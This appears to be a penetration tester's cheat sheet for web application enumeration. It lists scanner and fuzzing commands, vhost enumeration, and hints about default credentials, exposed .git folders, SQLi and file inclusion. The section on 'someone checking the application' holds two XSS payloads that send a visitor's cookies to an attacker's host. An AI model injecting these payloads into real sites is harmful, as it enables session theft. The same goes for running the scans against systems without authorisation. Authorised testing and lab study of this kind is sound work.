Enumeration

Tools to run:

nikto -host URL:PORT -C all 
feroxbuster -u URL:PORT -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o OUTPUT.txt
gobuster dir -u URL:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
wpscan --url URL:PORT --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive 
whatweb --color=never --no-errors -a 3 -v URL:PORT
wkhtmltoimage --format png URL:PORT OUTPUT.png
curl -sSikf URL:PORT/robots.txt
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://URL-H "Host: FUZZ.URL" -fs 7069 # 7069 = response on originating request

Vhost Enum:

# msf
use auxiliary/scanner/http/vhost_scanner
# fuff
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://amzcorp.local -H "Host: FUZZ.amzcorp.local" -fs 86

Look for:

Default Credentials / Shit Credentials, e.g. webapp name: nexus:nexus Comments in code that give information / paths Web App version - then check in good/searchsploit .Git folder -> GitTools (GitDumper.sh URL/.git/ OUTPUT && git checkout -- .)

Someone checking the application:

<img src=x onerror="this.src='http://192.168.49.73/?'+document.cookie; this.removeAttribute('onerror');">
<script type=“text/javascript”>document.location=“http://IP:PORT/?c=“+document.cookie;</script>

Exploits

look for the following in url:

URL/id=

Can be used for SQLi, PHP wrapping/ file inclusion

Spring-boot:

look for specific directories like /actuator